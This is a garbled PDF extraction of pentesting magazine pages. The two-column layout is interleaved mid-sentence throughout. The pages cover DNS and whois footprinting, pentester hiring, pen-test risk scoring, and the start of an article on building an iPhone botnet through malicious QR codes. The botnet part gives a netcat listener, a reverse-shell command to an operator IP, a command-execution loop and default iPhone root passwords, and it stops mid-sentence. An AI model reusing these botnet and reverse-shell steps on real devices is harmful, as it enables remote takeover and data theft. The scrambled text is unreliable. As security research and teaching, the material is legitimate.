CNAME record, and two A records and looking at the IP the previously mentioned tools will also handle PTR
addresses it is clear that is two different hosts. records.
Now doing this manually seems easy and quick,
(and it is!) but if we want to brute force or guess many Search engines
host names, then this will take too long. Of course, it DNS interrogation and mining forms the bulk foot
is easy enough to script these commands to automate printing, but thanks to modern search engines like
the process; however there are existing tools written Google and Bing, finding targets has become much
specifically for this purpose. One of the most popular easier.
Apart from the normal searching for your target, as
you would do in your initial phase, you can actually
use the data that you discovered during the course
of the DNS mining to try and get further information
using search engines. Bing from MicroSoft provides
us with two really useful search operators: ip: and site:.
When using the ip: operator, Bing will return a list of
hosts that it has indexed that resolve to the IP address
that you have specified. Alternatively the site: operator
when used with a domain name, will return a list of host
names that have been indexed by the search engine
and belong to the domain specified. Quick and easy,
and Bing also provides you with a very simple free API
Figure 3. Performing a zone transfer using dig that you can use to automate these searches.

Figure 4. Using dig to get the a record for a host entry Figure 5. Getting the netblock and owner using whois

THE BEST OF 01/2012 Page 118 http://pentestmag.com


ARIN (American Registry for Internet Numbers) or any
of the other regional registries (RIPE, AfriNIC, APNIC and
LACNIC). ARIN provides a reverse whois search interface
where one can search for organization names and
other terms, even performing wild card searches. Giving
Facebook a second look, we try a search on the reverse
whois interface found at http://whois.arin.net/ with the term
facebook, and get a list of five additional network ranges.

SSL Certificates
Figure 6. Search results for ARIN reverse whois
Lastly, we turn to SSL. SSL may be more familiar as
Address mapping a protection against nasty eavesdroppers and men-in-
All this fuss with DNS is important, but it is only use the-middle, but it is useful for footprinters. How? It is
insofar as they lead us to addresses. The next step really simple actually, one security checks performed
is discovering where the target exists within the IP by browsers when deciding on the validity of a SSL
address space. Luckily very useful tools and resources certificate is whether the Common Name contained in the
exist to help us uncover these ranges, by automating certificate matches the DNS name of the host requested
a combination of manual techniques such as whois from the browser. Now how does this help? Say a list of
querying, traceroute and netblock calculators. In the IP addresses has been produced; the next step would be
previous section the whois tool was used to get the to perform a reverse lookup of all these IP addresses.
domain owner information. The same tool can be used However, if no reverse entry is present and Bing has no
to discover the ownership/assignment details of a record of the IP, then some creativity is called for. If an
specific IP address. Let take www.facebook.com. One HTTPS website is hosted on that address then simply
of the IP addresses that it resolves to is 69.63.190.10. browse to that IP address and, when presented with the
whois 69.63.190.10 produces the following output. invalid certificate error, message, look for the real host
From the whois output we get really useful information. name.
First is a netblock range 69.63.176.0-69.63.190.255 as Again, this is something that is easily automated, so
well as the owner of this net block, namely Facebook, Inc. the guys at SensePost have included a module in Yeti
In this case we are lucky and the netblock is registered to actually do this for you.
to facebook, but often you will only get the network
service provider to which the netblock is allocated to. So Conclusion
then you will have to go and query the service provider Foot printing might at first glance appear to be simple
in order to gain more info about the specific netblock. and mundane, but the more you do it, the more you
Online resources can also be very useful, for example will realize that very few organization have a handle
on exactly what they have and what they present to the
internet. And as the internet and networks evolve so does
the way companies and organization use it, and so does
their footprint. A year-old footprint could be hopelessly
outdated, and ongoing footprinting helps organizations
maintain a current view of their threat landscape.
With the ongoing move away from local infrastructure to
hosted infrastructure, the footprint expands, spreads and
grows, and so will our quest to find as much as possible.

WILLEM MOUTON
Willem hails from a developement background having worked
on projects ranging from banking applications to embedded
GSM devices. He moved into the security �eld purly because
it is way more fun to break orther peoples applications. He is
currently a securtiy analyst/foozeball player at Sensepost and
is responsible for breaking applications and building some
Figure 7. Firefox reporting the common name contained in a SSL tools. He has also presented training at BlackHat events. Oh
certi�cate for a host and he is a really big fan of Shaun the Sheep.

THE BEST OF 01/2012 Page 119 http://pentestmag.com


PENTEST MARKET

The Hunt for


Pentesters
As the world of IT becomes more and more sophisticated, so does
the demand for experienced IT professionals. Good pentesters are
particularly hard to find because they need to be both deeply technical,
and highly communicative.

W
hen a company hires a penetration tester, trust preventive medicine: You don’t really know if it’s working
is everything. Indeed, a company will have to or exactly how well it’s working, but you do know when
expose its internal security operations and all it fails (Sperling, 2009). As such, companies often
sorts of secrets to pentesters, should they be internal or hire consulting companies that will not only perform
hired through a consulting company. Because of this, penetration testing but will also offer complete security
the recruitment process should not only assess the audit services. Therefore, consulting companies such
technical skills but should also assess the personality as the Big-4 and other smaller ones, make the big part
and background of a potential pentester. of the companies employing pentesters.
The aim of this article is to give the reader and idea of the In short, there are two types of employers: end clients
criteria assessed by headhunters to identify trustworthy such as financial institutions, and consulting companies.
and technically capable pentesters. By shedding light on As we will discuss further in this article, assessing the
those aspects, this article will therefore give the readers soft skills part of a pentester for a consulting company
an understanding of the usual education, competencies should be well processed and mastered. The reputation
and soft skills a valuable pentester should demonstrate. of a consulting company could be seriously damaged
if the pentester was to fail to demonstrate honesty and
Who hires pentesters? professionalism in delivering projects to its customers.
Due to a high level of due diligence to ensure the Ed Sperling, (02/09/2009). Measuring IT Security
confidentiality, integrity and availability of customer Costs. Forbes, Retrieved from http://www.forbes.com/
transactions, pentesters are often sought at banks and 2009/02/07/security-information-tech-technology-cio-
other financial companies. However, IT security is also network_0209_security.html.
an issue in other industries such as pharmaceutical,
consumer goods, manufacturers, telecommunications, How to get to pentesters?
etc. These companies need to rely on an IT infrastructure Like in other industries, good talent is hard to find.
that must be efficient at all time to ensure performance The best pentesters are not on job boards because
not only for internal people but also for external they don’t need to be. Employers understand their
audience, such as clients, investors, suppliers, etc. value and, unless economic situations force them to
Another aspect to point out in order to define the types cut back, make them stay and feel comfortable in their
of clients is the cost of IT security. It is often seen as a position.

THE BEST OF 01/2012 Page 120 http://pentestmag.com


That’s where the headhunter’s job begins-- finding The academic criteria should not be a prohibitive
the best suitable candidate for a potential client. In the criteria. Expert pentesters often have lower education
ethical hacking area, it is often said that the tester should backgrounds and when it comes to penetration
think like a hacker to be able to identify vulnerabilities; testing, one should also value the weight of practical
so do the headhunters to identify pentesters profiles. An experience.
expert headhunter will have to jump into a pentester’s Penetration testing is an ever-changing art. A good
shoes in order to reach his network and find the suitable penetration tester will have to constantly ensure a
candidate. This can be done by reviewing the pentesting technology watch in order to stay informed on the
blogs and contacting the most active members, getting latest threats and the evolution of the IT infrastructure.
names from relevant certification exam subscriptions, Constantly working with new technology enables the
consulting popular social media networks, reaching tester to anticipate system vulnerabilities, to address
personal contacts that would recommend a headhunter them, and master the detection tools. An indication
to expert candidates, etc. of extra-professional activities such as blogging,
An important subject that I feel should be discussed participation in seminars or other ethical hacking
here is whether a company should hire a blackhat meetings will confirm that the candidate is keeping up to
hacker as a penetration tester. There is no clear answer date on the technics and will furthermore demonstrate
on that matter and the decision should be pondered; curiosity, tenacity, and passion; qualities that are
however there are several points to consider before essential to be a valuable pentester.
hiring a blackhat hacker:
Certifications and further education
Risk Eventually, a pentester would feel the need to certify
Even though hackers can test the system to its limit, his practical knowledge or to get further trainings.
a consulting company takes a high risk in hiring past Headhunters and companies will highly value
criminals (convicted or not) in their teams. If you do not certifications in IT security, especially consulting
trust the individual to do what they were hired for, and companies which services can be sold with high added
nothing more, then you should not use the resource. value.
I have listed below the most common certifications in
Testing methodology is different IT security. While penetration testing is a component of
The blackhat hacker will often exploit a weaknesses IT/security audit, the here below certifications/trainings
to fully penetrate the system, whereas the well-trained will either focus on penetration testing or IT audit. See
penetration tester may test an identified vulnerability Table 1.
to the point of confirming it, then move on to finding After the selection process that consists in reviewing
additional vulnerabilities. the resumes, the soft skills assessment can start in the
framework of interviews.
Understanding the business is key
A blackhat hacker might have valuable technical skills, Soft skills
but he might not have the necessary business acumen Let’s have a look at the soft skills needed to perform as
to communicate the risk behind the vulnerability. a pentester.
Security is only taken into account by CIOs when there The main qualities required for a position of
is an identified risk to the business that could lead to penetration tester are:
potential financial losses.
• Being an information sponge – Curiosity and
What will headhunters look for in a willingness to constantly learning. As mentioned
pentester’s resume? earlier, expert pentesters are the ones that keep up
Education to date on the latest technologies and that can also
There is no specific program focused either on IT anticipate new potential threats.
security or on penetration testing. Pentesters have • Solution-oriented and investigative skills. The work
usually a MSc degree in IT. The work of a pentester of a pentester is to find what should not be found; a
is demanding and hands-on knowledge is needed. pentester need to be comfortable with ambiguous
Penetration testing is also one aspect of IT security and complex situations.
and the entry level of a career that could lead to more • Big picture orientation. A pentester should
auditing or risk assessment, hence the requirement for understand the contribution and impact of his work
a higher level of education. to the overall company structure.

THE BEST OF 01/2012 Page 121 http://pentestmag.com


Table 1. Certi�cations
Certi�cation Description Requirements
IT AUDIT
ISACA Certi�ed Information Security Audit (CISA)
(www.isaca.org) This is the basic and the most important among the audit Taking the exam requires a minimum of 5 years of
certi�cations. Companies do require more and more professional information systems auditing, control or
this certi�cation as a proof of mastering the concepts of security work experience (as described in the CISA job
security, control and audit of information systems. practice areas). The CISA exam consists in a multiple-choice
exam of 200 questions to be answered in 4 hours.
Under certain circumstances, the certi�cation can be done
prior to the 5-year work experience (see the website for
further details).
Certi�ed Information Security Manager (CISM)
Certi�ed Information Security Manager (CISM) The CISM exam consists in a multiple-choice exam of 200
The CISM is designed for (Aspiring) Information Security questions to be answered in 4 hours. A candidate must
Managers but also for IT/IS consultants. While CISA exam receive a score of 450 (out of 800) or higher to pass the
is the most popular, CISM is more geared towards security exam.
management. You do not need CISA to earn CISM.
ISC2 Certi�ed Information Systems Security Professional (CISSP)
(www.isc2.org) There is a competition between CISA and CISSP. A lot of The candidate must possess a minimum of �ve years of
professionals I have talked with are saying that the CISSP is professional experience in the information security �eld or
more valuable and demanding in terms of technical skills. four years plus a college degree. There are some exceptions
The CISSP CBK consists of the following ten domains: to those requirements (see website for further details). A
• Access Control candidate that passes the CISSP exam must be endorsed by
• Telecommunications and Network Security another (ISC)² certi�ed professional before the credential
• Information Security Governance and Risk Management can be awarded. Passing candidates will be randomly
• Software Development Security selected and audited by (ISC)² Services prior to issuance of
• Cryptography any certi�cate.
• Security Architecture and Design
• Operations Security
• Business Continuity and Disaster Recovery Planning
• Legal, Regulations, Investigations and Compliance
• Physical (Environmental) Security

Lead auditor ISO/IEC 27001


The certi�cation is to ensure that the candidate has the
knowledge and the skills to audit an Information Security
Management System (ISMS) based on ISO 27001 and to
manage a team of auditors by applying widely recognized
audit principles, procedures and techniques.
ETHICAL HACKING
EC-Council Certi�ed Ethical Hacker (CEH)
(www.eccouncil.org) The Certi�ed Ethical Hacker certi�cation will fortify the You need to earn the ENSA certi�cate before taking the CEH
application knowledge of security officers, auditors, exam.
security professionals, site administrators, and anyone
who is concerned about the integrity of the network
infrastructure.
Certi�ed Hacking Forensic Investigator (CHFI)
The CHFI certi�cation validate the candidate’s skills to Computer forensics pro�les are in high demand in the US
identify an intruder’s footprints and to properly gather the and in government agencies as cyber criminality is on the
necessary evidence to prosecute in the court of law.The rise
CHFI certi�cation will bene�t:
• Police and other law enforcement personnel
• Defense and Military personnel
• e-Business Security professionals
• ystems administrators
• Legal professionals
• Banking, Insurance and other professionals
• Government agencies
• IT managers
Licensed Penetration Tester (LPT)
This certi�cation s a natural evolution and extended You must achieve both CEH and ECSA to apply for the
value addition to its series of security related professional certi�cation.
certi�cations. The LPT standardizes the knowledge base
for penetration testing professionals by incorporating best
practices followed by experienced experts in the �eld.
The objective of the LPT is to ensure that each professional
licensed by EC-Council follows a strict code of ethics, is
exposed to the best practices in the domain of penetration
testing and aware of all the compliance requirements
required by the industry.
The objective of Certi�ed Security Analyst “pen testing”
certi�cation is to add value to experienced Information
Security professionals.
GIAC GIAC Certi�ed Incident Handler (GCIH)
(www.giac.org) GIAC Certi�ed Incident Handlers (GCIHs) have the SANS Institute delivers training for all the GIAC
knowledge, skills, and abilities to manage incidents; to certi�cations. (www.sans.org)
understand common attack techniques and tools; and to
defend against and/or respond to such attacks when they
occur.
This certi�cation is for individuals responsible for incident
handling/incident response; individuals who require
an understanding of the current threats to systems and
networks, along with effective
GIAC Penetration Tester (GPEN)
The GPEN certi�cation is for security personnel whose SANS Institute delivers training for all the GIAC
job duties involve assessing target networks and systems certi�cations. (www.sans.org)
to �nd security vulnerabilities. Certi�cation objectives
include penetration-testing methodologies, the legal issues
surrounding penetration testing and how to properly
conduct a penetration test as well as best practice technical
and non-technical techniques speci�c to conduct a
penetration test.
GIAC Web application Penetration Tester (GWAPT)
Web applications one of the most signi�cant points of SANS Institute delivers training for all the GIAC
vulnerability in organizations today. Most organizations certi�cations. (www.sans.org)
have them (both web applications and the vulnerabilities
associated with them). Web app holes have resulted in the
theft of millions of credit cards, major �nancial loss, and
damaged reputations for hundreds of enterprises. The
number of computers compromised by visiting web sites
altered by attackers is too high to count. This certi�cation
measures and individuals understanding of web application
exploits and penetration testing methodology.
GIAC Certi�ed Exploit Developer (GXPN)
This exam certi�es that candidates have the knowledge, SANS Institute delivers training for all the GIAC
skills, and ability to conduct advanced penetration tests, certi�cations. (www.sans.org)
how to model the abilities of an advanced attacker to �nd
signi�cant security �aws in systems, and demonstrate the
business risk associated with these �aws.
ISECOM OPST (OSSTMM Professional Security Tester)
(www.isecom.org) The OPST is a certi�cation of applied knowledge designed OSSTMM stands for Open Source Security Testing
to improve the work done as a professional security Methodology Manual. Many researchers from various
tester. This is a certi�cation for those who want or need �elds contributed because they saw the need for an
to prove they can walk the walk in security testing, the open method, one that was bound towards truth and not
discipline which covers network auditing, ethical hacking, commercial gain or political agendas.
web application testing, intranet application testing, and
penetration testing. And it is a critical, eye-opening class for
security auditors, network engineers, system and network
administrators, developers, network architects, security
analysts, and truly anyone who works in IT from systems to
networks.
• Analytical capacity. To be able to find vulnerabilities, different industries and IT infrastructures. It will give
a pentester need to have a methodological and the headhunters the evidence that a pentester is
deductive approach. Analytical skills will also help flexible in different environments.
him to write good reports and to summarize his • Customer service. A pentester consultant will have
findings. to take action and make decisions that successfully
• Capacity to explain technical terms to non-technical build customer value; customer must be put at the
people. This is essential to define a common central of all thinking.
ground from which to begin in explaining problems
and recommending remediation steps in a way that In conclusion, both technical and soft skills aspects
is easily understandable by the client. need to be evaluated to hire a valuable and expert
• Honesty and ability to deal with sensitive data. It is penetration tester. I believe that this article has drawn
particularity essential for pentesters in consulting what is the common profile of a penetration tester
companies as they will have access to data at their with respect to both sets of skills. Now you know that
clients. These skills are even more important in the headhunters are watching you!
forensics area (cyber criminality).
• Writing skills. A critical part of the job as a pentester
is being able to write reports FABIANA SCHÜTZ
• Language skills if not English speaking Fabiana Schütz graduated in Work and Organizational
Psychology at the University of Neuchatel (Switzerland) in
In addition, more skills can be required when working 2006 where she spent one year studying at the California
in consulting companies: State University of Long Beach. Co-founder of Mensys Group,
a recruitment agency specializing in niche markets within IT,
• Versatility. These companies will highly value the Engineering and LifeSciences, they operate in Europe with
fact that a pentester has various experiences in offices in Switzerland and Poland.

a d v e r t i s e m e n t
PENTEST STARTERKIT

Pen Testing and


Risk Management
According to new research from security vendor Imperva,
distributed denial of service and SQL injection are the main types
of attack discussed on hacking forums. Underground discussion
forums are an important piece in the cybercriminal ecosystem.
They offer a place for hackers to sell and exchange information,
software tools, exploits, services and other illegal goods.

F
orums are the cornerstone of hacking – they are discussed attack method, being at the center of 19
used by hackers for training, communications, percent of conversations.
collaboration, recruitment, commerce and even Unsurprisingly, with a 16 percent discussion occur-
social interaction, Imperva stressed. rence rate, spam is the third most favorite attack
In recent years, the movement in hacking forums has type according to Imperva’s content analysis. That’s
increased by 150%. We believe this increase reflects probably because it is one of the primary methods of
the higher number of failures, simply because there generating illegal income.
are more attackers chasing security breaches, the Network and computer vulnerabilities caused by
company said. misconfiguration, unsafe coding and lack of proper
Imperva’s researchers have recently analyzed discus- security updates still are a nightmare for mission-critical
sions going back several years from HackForums.net, applications in organizations worldwide, impacts the day-
one of the largest hacker forums with over 220,000 to-day organizations in such challenging security world.
registered members. Their effort was aimed at For instance a simple virus activity in IT environment
determining the most common attack targets, what causing a main server outage and huge financial losses
business trends can be observed, and what directions as well as affect the image of the whole organization,
hackers are leaning toward. whenever service outage cause any direct impact to
As far as attack popularity goes, the analysts customers.
determined that DDoS was mentioned in 22 percent of Security guidelines and awareness for infrastructure and
discussions. SQL injection, a technique commonly used development staff, as well as use of sophisticated Intrusion
to compromise websites, is the second most frequently Prevention Systems, vulnerability scanners, antivirus,

������������������ �������� ��������

�������������������������������������� ��������������� ��������������������������


������������������ ��������������������������������������� �������������������������������������������
����������������� ������������������������ �������������������������
������������������

Figure 1. Pentest plan

THE BEST OF 01/2012 Page 124 http://pentestmag.com


security updates and fixing management technologies level of risk that businesses are exposed and seeks to
has been helping so much on minimizing the risk. facilitate risk management decisions.
But how many companies want to invest in ongoing
security preventative measures? The Goals Of The Penetration Test Should Include
Just in case of having regulators and compliance
reporting (such as Basel II, SOx, SSAE 16, etc.) that’s • The analysis of the real threats inherent in a
an easy question, in other organizations the information business system;
security necessity just come after a huge outage or • Relate the impact of the techniques and
financial loss, mainly devoted to IT inefficiency because vulnerabilities associated with the business; and
the absence of technical knowledge by business • Ensure promptly solutions through a risk analysis
management staff in considering such IT Security Risks security assessment.
and Business Impact before.
What I´ve seen in several years of consultancy Objectives
almost daily, are executives still under the shock of the
incidents, hiring information security experts temporarily • Provide a focus for risk based for real threats the
to cure problems caused by a security vulnerability business is exposed;
exploited previously by a hacker. • Providing penetration testing during an analysis
But this approach is the best solution for a long-term of the effectiveness of the security mechanisms
security program? Security specialists would improve verifies the actual implementation of policies,
every vulnerability, security configurations, coding and procedures and configuration guidelines;
updating issues, but without proper planning, processes • Identify logical failures, network monitoring and
and follow up: Incidents and outages will happen again, security platforms present in applications;
putting the business at risk! • Provide a result linked to organization risk
Sometimes an incident can make the improvements management processes;
that were already expected by Business and IT staff • Ensure the maximization of the value and the
for a long time. But as a lesson learned executives validation of the results of tests carried out in such
have to begin to use new methods to direct and control a way as to balance the depth of testing;
the activities of information security, ensuring strategic • Reach a broad coverage of all relevant systems with
alignment and anticipating problems, in other words: a detailed balancing, focused on specific targets;
Information Security Risk Management. • Provide a root-cause analysis of the problems
encountered in order to enable the development of
Pen Test Methodology a strategic solution; and
In this scenario Penetration Testing methodology can • Provide rigid security management framework in
help as an additional test for Information Security Risk assessing such compliance.
Management. This approach
provides a test on the information ��������
security controls and also about the ���
����������
effecti-veness of security policies
against the various threats to the
business system.
The penetration test is a
����
security assessment technique, ���������
with the goal of increasing the
efficiency and effectiveness
on the controls, and proper
understanding of vulnerabilities ���� ����
��������������������
found in different systems in an ���������� ��������

organization.
However the penetration test
also provides a real picture ����
of technological risks related �����������

to the business. A Pen Test


methodology helps to reveal the Figure 2. Risk management

THE BEST OF 01/2012 Page 125 http://pentestmag.com


PENTEST STARTERKIT
Defining Pen Test Priorities Interaction with Information Security Risk
Generally, an ideal Pen Test should focus on testing Management
of high-value computer assets with higher risk and low Mainly by international regulations, more and more
operation outage impact to client. organizations are moving to a risk-based audit
The client should always be aware about the benefits approach that can be adapted and translated to develop
provided by a test with information and classification of and improve the continuous information security risk
targets in spite of a test without any information and management process.
target classification imprecise and high probability of A risk based approach relies on internal and operational
operational impact, although simulating an outsider controls as well as the impacts to organization business.
attack method. This type of risk assessment decision can help relate
Some Pen Testing reasons to be performed in the the cost/benefit analysis of the control to the known risk,
organization: allowing practical and business focused choices.
By understanding the nature of the business, risk types
• Regular assessment of IT security procedures for can be identified and categorized. The risk assessment
configuring, updating and coding. model can be as simple as creating weights for the types
• Pre-testing of implementing a new critical business of risks associated with the business and identifying the
product/service; risk in an equation, considering Complexity, Probability
• Intrusion detection and prevention systems testing; and Impact.
• Security monitoring testing, report, classification On the other hand, risk assessment can be a scheme
and treatment of incidents; where risks have been given elaborate weights based
• Wider vision regarding the relationship of several on the nature of the business or the significance of the
threats present in the technological environment; risk.
• Search for faults or coding errors in the software; Pen Testing is a part of Risk Monitoring and mitigation
and plans are often linked to enterprise survivability as well
• Waiver of dissemination of security practices on the as business process reliance on information systems
staff activities. confidentiality, availability and performance.

Table 1. Organization impact


Impact Type Business Low Medium High
Impact
Reputation/ Reputation Local short term loss of Negative Publicity primarily Ongoing loss of brand
Customer Goodwill with business and industry credibility
Con�dence press
Reputation/ Customer Loss Minimal disruption to Threat of long term damage to Long term loss or key
Customer customer supplier relationship customer supplier relationships customer/ supplier
Con�dence
Financial Operating Costs Minimal reduction in Widespread short term Widespread failure of
Productivity, Inefficient short reduction in other unit production, Viability of
term operation of business productivity, Business unit business unit seriously
unit, Minimal effect upon other operations compromised in threatened, Serious impacts in
operations, Minimal increase in the longer term, Widespread other areas of the business.
failure rates/ product return or short term reduction in
re-work rates productivity
Financial Revenue Loss Less than 5% yearly revenue 5 to 30 % yearly revenue loss Greater than 30 % yearly
loss revenue loss
Financial One Time Minimal Unbudgeted costs/ Unbudgeted costs/loss of pro�t Unbudgeted costs/loss of
Financial Loss loss of pro�t incurred incurred of > USD 2.000.000 pro�t incurred of > USD
and < USD 30.000.000 30.000.000
Fines/Legal Fines/ Penalties Fines less than USD 200.000 Fines between USD 200.000 Fines greater than USD
Penalties are levied. and USD 2.000.000 are levied. 2.000.000 or Unlimited
Damages/Penalties/Fines are
levied
Fines/Legal Lawsuits/ Local Dispute Serious local regulatory Legal Actions in a Worldwide
Penalties Investigations breach Context

THE BEST OF 01/2012 Page 126 http://pentestmag.com


Table 2. Complexity
Factor Complexity Probability Business Impact
1 Low: Below 30 �ndings. Rare: Not Seen Not Insigni�cant: No signi�cant impact or
limited consequence.
2 Medium Low: Between 30 and 50 Unlikely: Not seen in the last 5 years Less: Impact on a small part of the
�ndings. business.
3 Medium: Between 50 and 100 �ndings. Moderate: Seen the last 5 years but Major: Impact on the organization’s
not seen in the last year image.
4 Medium High: Likely: Seen since last year. Material: Impact requires formal report to
100 to 400 �ndings. Business Management.
5 High: Common: It happens on a regular Catastrophic: Widespread Failure or
More than 400 �ndings. basis. signi�cant reduction of business activities.

Risk Monitoring is generally designed to reduce risks Security Hardening Priorities


that could prevent an organization from achieving its Having mapped all vulnerabilities and risks, the next
mission by addressing the underlying threats that step is listing security measures required.
explore security vulnerabilities found in a given IT Obviously, an organization cannot implement every
environment. possible security measure immediately, but ranking
A Mitigation plan or vulnerability fixing plan can them by risk would ease considerably such process
address threats in one or more of the following ways: ranking priorities and plans.
As soon as having in mind the cost of control measure
• Recognize threats as they occur. it can NEVER be more expensive that the business
• Resist threats to prevent them from occurring. process being secured, a good approach for identified
• Recover from threats after they occur. vulnerabilities in order to avoid high business exposure,
should be:
All identified vulnerabilities discovered in Penetration
Testing may be addressed and classified in an • High Risk – immediately or up to 1 week
Organization Impact Matrix, i.e. a business stakeholder • Medium Risk – between 1 week and 1 month
perception in order to provide guidance on Business • Low Risk – between 1 and 6 months
Impact Classification.
Risk Factor score is a Semi-Quantitative analysis that
allows establishing a magnitude scale for each process
in accordance with security vulnerability findings
identified in a Pen Test aligned with the risk perceptions
of business stakeholders involved: ALESSANDRO MANOTTI
Alessandro Manotti CISA, CISM – professional with over 12
• Complexity: Number of vulnerability findings in years in Audit and Information Security Consultancy, working
information assets affected by: computers, servers, in �nancial, telecom and automotive industries in Brazil and
network devices, systems, etc. abroad, professional history:
• Probability: An estimation of the threats exploring • Consultant in an international audit �rm, worked in 2 BI-
vulnerabilities found lately. G4s, conducting audit, regulation (SOx, Basel II,SSAE16),
awareness, gap analysis (COBIT, ITIL, ISO27002) digital
• Business Impact: The consequences for business certi�cation, and identity management projects.
processes considered if the risk materializes, in • Local Information Security Officer in a world-leading busi-
other words if undesirable events happen. ness process outsourcing organization (BPO).
• Systems Audit Coordinator in one of the largest �nancial
Risk factor is obtained by a simple average of the risk groups in Europe.
• Member and certi�ed by ISACA as Certi�ed Information
factors mentioned, or:
System Auditor (CISA) and Certi�ed Information Security
Manager (CISM).
Risk = Complexity + Probability + Impact / 3 • Book: Practical IT Auditing – Curso Prático Auditoria de Si-
stemas (in portuguese language): Understand how works
• IF Risk is less than 2 LOW, Internal and External audits in a pratical manner, Alessan-
• IF Risk is less or equal 3 MEDIUM, dro Manotti – Publisher: Editora Ciencia Moderna Brazil
1st. Edition, 2010.
• IF Risk is over 3 HIGH

THE BEST OF 01/2012 Page 127 http://pentestmag.com


PENTEST STARTERKIT

QRbot
– iPhone QR botnet
Every time that new technology is revealed, lots of security
researchers seek for vulnerabilities in it. In my case, I am looking
for security holes in the integration between QR readers and smart
phones, especially on iPhone.

T
his article is related to both social engineering favorite places i.e. to see review on a restaurant before
and cyber-crime. Why social engineering? entering, Google chrome add-on, museums, house
Since QR usage is based on interactive actions selling advertisements, on CDs to watch a clip of the
of mobile users, which might lead to threats on their band, troubleshooting on electronic devices, restaurant
devices, as will be explained in detail later. menus etc.
Why cyber-crime? The actions taken by criminals not In order to read the QR code, the mobile device (not
only harm the mobile phone/device users, but also may only smart phones) should include a specialized code
steal sensitive information or aid in launching massive reading and decoding software. The mobile device can
actions using controlled, Zombie-based networks translate it differently to actions, e.g. open URL, send
(Botnets), e.g. DDoS – Distributed Denial of Service SMS, make calls, add contacts, show text etc.
attacks. However, there are QR codes that cannot be read by
In order to explain the whole process, this article mobile devices because they are encrypted. A matching
begins from the basics of QR and iPhone Usage. decryption key is required to view the content.
After understanding the basics, we will dive into the
actions needed to build a QRbot. Finally, avoidance QR abuse
recommendations will be explained. The main problem of the QR is that the human eye
cannot decode the message. This makes the following
What is QR? social attacks possible:
A QR (Quick Response) code is a type of matrix
barcode that was developed in order to automate the
industry. The code consists of black modules arranged
in a square pattern on a white background, e.g. the QR
code in Figure 1 is decoded to the phrase Do you think
that information security is expansive? Try to ignore it!
There are similarities to the QR, such as EZcode, QM,
but the QR is the most common.
The QR is used in various places and media types:
newspapers, TV, business cards, books, Google Figure 1. Demo text

THE BEST OF 01/2012 Page 128 http://pentestmag.com


QRjacking QR botnet
A malicious sticker can be pasted over the original After understanding QR threats and iPhone limitations, I
sticker, e.g. on public advertisement in the street or can explain the idea behind the title of this article.
other public spaces, simply replaced where possible In order to build a botnet we need to combine
– websites, brochures etc. the threats of the QR code readers with the iPhone
limitations.
Scanjacking The main idea of this attack is to install a malicious
The scanned barcode would redirect to malicious web application from a web server directly on the iPhone. It
site or run any malicious code. Hence, various attacks almost does not matter whether the iPhone is legal or
can be executed, e.g. phishing, man-in-the-browser jailbroken with default root password.
(form of man-in-the-middle attack), SMS abuse (social
engineering is required) etc. Step 1: Locate vulnerable QR reader
Since we would like to install an application from a web
IPhone users and application permissions site, the QR reader should have automatic redirection to
IPhone devices can be divided into two main categories URL. I have been testing the following 10 applications
– legal (factory default configuration) and jailbroken on my iPhone with iOS 5: QRReader, RedLaser,
(running a hacked, modified operating system version). QR+, ShopSavvy, Scan, ConnectMe, HP CodeScan,
On one hand, legal iPhone devices can execute only ATTScanner, ScanLife and i-Nigma. To make it close
Apple-approved applications, which may lower the total to the reality, I searched the word QR in App Store and
risk of getting malicious software on the device. On the downloaded the first 10.
other hand, the jailbroken devices are more vulnerable I generated a QR code for a website and scanned
to malicious applications since these devices allow the code in each application. The following applications
installation of applications which had not been checked have automatic redirection: QRReader, ShopSavvy,
and verified by Apple. Scan, HP CodeScan, ScanLife and i-Nigma. Summary:
There are several options to install applications on 6 of 10 were vulnerable to automatic redirection, e.g. i-
iPhones: App Store, iTunes, iPhone configuration Nigma opens Safari automatically and redirects to the
utility and over-the-air (from a web server). Of course, requested page, see screenshot in Figure 2.
Cidya and Installous are also available on jailbroken What should appear when automatic redirection is
devices. disabled? See screenshot of RedLaser’s question in
One thing is certain about both the legal and most of Figure 3.
the jailborken devices – they have a default password
for the root user; by default it’s alpine (without the
quotes, of course).
Why is this interesting? By default, applications
don’t have root access to the iPhones but instead are
provided with a limited access by the user mobile (for
which the default password is dottie). In order to get root
privilege access, we need to do some coding as will be
explained later in this article.

Figure 2. Automatic redirection in Safari Figure 3. Popup on non-redirecting QR reader

THE BEST OF 01/2012 Page 129 http://pentestmag.com


PENTEST STARTERKIT
Step 2: Run botnet operator include some details about the iPhone, e.g. IP (usually
The concept of this botnet is based on a client-server behind a NAT), system version etc. The next commands
application. The server runs Netcat (built-in program on run in endless loop (while true): cat is a command to
Linux and Mac), which listens to incoming connections. print the content of a file; in this case, cat prints the
The following command should be running on the content of the banner or any content in the ~/result
server: file. The 2nd system command is combined of printing
the content as explained and passing it as input to the
nc -k -l 3333 netcat application, which sends the message to the bot
operator. Since the operator should have control, the
Explanation: Netcat is listening on port 3333 and waiting 3rd command opens a netcat and stores the output of
for another connection after its current connection is the 1st row (the command from the operator), and then
completed. the command is passed as STDIN to the awk command,
which runs the command on the operating system.
Step 3a: Build bot Note: even if awk is not installed on the iPhone, the
The development of iPhone applications is performed output can be written to bash file and then executed.
on Xcode (I use version 4.2 on Lion), which can be The 2nd command above is now executed to print the
downloaded and installed for free from Apple’s web site. output of the system to the botnet operator.
In addition, in order to be able to sign the application, a What are the limitations in the code above? My test is
developer account is needed – it costs some money. based generally on iPhone emulator, however the code
There are ways to bypass signing, but I rather not to might be changed since applications on legal iPhone
discuss them in this article. run in a sandbox with limited permissions. On physical
Our bot is based on reverse backdoor shell attack, iPhone the bot is running under mobile user (not a root),
which is implemented by using netcat. A reverse which means that its current functionality can produce
backdoor shell is a scenario when a remote device (i.e. only DDoS attacks. The good thing about this is that it
iPhone) connects to server (i.e. botnet operator) and does not matter if the iPhone is jailbroken or not.
then executes local system commands on the device. If we had a root access, what could the QRbot do?
In order to execute the attack, the following command Collect personal data e.g. contact lists, emails, last
should be run: nc [operator’s_ip] 3333 -e /bin/bash. visited GPS locations, run as a malware even after
However, by default Mac devices don’t support the -e or uninstalling the application by adding tasks to the
-c operators. I was testing various versions of “netcat” “crontab” (scheduled tasks), steal cache and generally
and tried to compile it for different operating systems, backup the iPhone. Is it hard to get root access? The
none of them worked in execution mode. Some of you ‘sudo’ command is not implemented by default on iOS,
might think that Mac OS/iOS is only a permutation but the ‘su’ command does. The limitation of ‘su’ is that by
of FreeBSD, however the bottom line is that it won’t running the command, a different shell is started, which
work for me. I decided to build my execution mode, means that in this case, running the command as script
